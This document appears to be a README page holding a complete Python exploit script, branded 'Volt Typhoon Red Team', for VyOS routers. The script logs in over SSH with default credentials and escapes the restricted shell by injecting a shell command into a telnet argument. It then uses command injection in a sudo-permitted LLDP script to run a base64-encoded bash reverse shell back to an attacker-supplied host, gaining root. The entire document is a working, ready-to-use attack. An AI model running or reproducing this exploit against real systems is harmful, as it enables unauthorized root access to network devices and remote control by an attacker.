README.md
Rendering markdown...
import base64
import paramiko
import time
import argparse
RPORT = 22
USERNAME = 'vyos'
PASSWORD = 'Pa$$w0rd'
ascii_art = r'''
\. |\
\`.___---~~ ~~~--_
//~~----___ (_o_-~
' |/'
__ __ _ _ _____ _
\ \ / /__ | | |_ |_ _| _ _ __ | |__ ___ ___ _ __
\ \ / / _ \| | __| | || | | | '_ \| '_ \ / _ \ / _ \| '_ \
\ V / (_) | | |_ | || |_| | |_) | | | | (_) | (_) | | | |
\_/ \___/|_|\__| |_| \__, | .__/|_| |_|\___/ \___/|_| |_|
|___/|_|
VOLT TYPHOON RED TEAM
'''
def main():
print(ascii_art)
parser = argparse.ArgumentParser(description="VyOS Privilege Escalation Exploit - Volt Typhoon Edition")
parser.add_argument("-t", "--target", required=True, help="Target IP address")
parser.add_argument("-lhost", "--localhost", required=True, help="Localhost IP for reverse shell")
parser.add_argument("-lport", "--localport", required=True, help="Local port for reverse shell")
args = parser.parse_args()
RHOST = args.target
LHOST = args.localhost
LPORT = args.localport
payload_cmd = f"bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1"
payload_b64 = base64.b64encode(payload_cmd.encode()).decode()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print(f"[+] Connecting to {RHOST}:{RPORT} as {USERNAME} ...")
ssh.connect(RHOST, port=RPORT, username=USERNAME, password=PASSWORD, look_for_keys=False, allow_agent=False)
print("[+] Connected.")
chan = ssh.invoke_shell()
time.sleep(1)
output = chan.recv(65535).decode('utf-8').lower()
print("[*] Initial shell output:")
print(output)
if 'vyos' not in output:
print("[-] Target does not appear to be VyOS.")
ssh.close()
return
if '> ' in output:
print("[*] Restricted shell detected. Attempting breakout...")
chan.send("telnet ';/bin/sh'\n")
elif '$ ' in output:
print("[*] Unrestricted shell detected.")
chan.send("/bin/sh\n")
else:
print("[-] Unexpected shell prompt. Exiting.")
ssh.close()
return
time.sleep(2)
output = chan.recv(65535).decode('utf-8')
print("[*] After breakout attempt:")
print(output)
exploit_cmd = f"sudo /opt/vyatta/bin/sudo-users/vyatta-show-lldp.pl -action show-neighbor -i ';echo {payload_b64}|base64 -d|/bin/sh'\n"
print("[*] Sending privilege escalation payload...")
chan.send(exploit_cmd)
print("[*] Payload sent. Check your listener for a reverse shell.")
print("[*] Press Ctrl+C to exit.\n")
try:
while True:
time.sleep(1)
if chan.recv_ready():
resp = chan.recv(4096).decode('utf-8')
print(resp, end='')
except KeyboardInterrupt:
print("\n[*] Exiting.")
finally:
ssh.close()
if __name__ == "__main__":
main()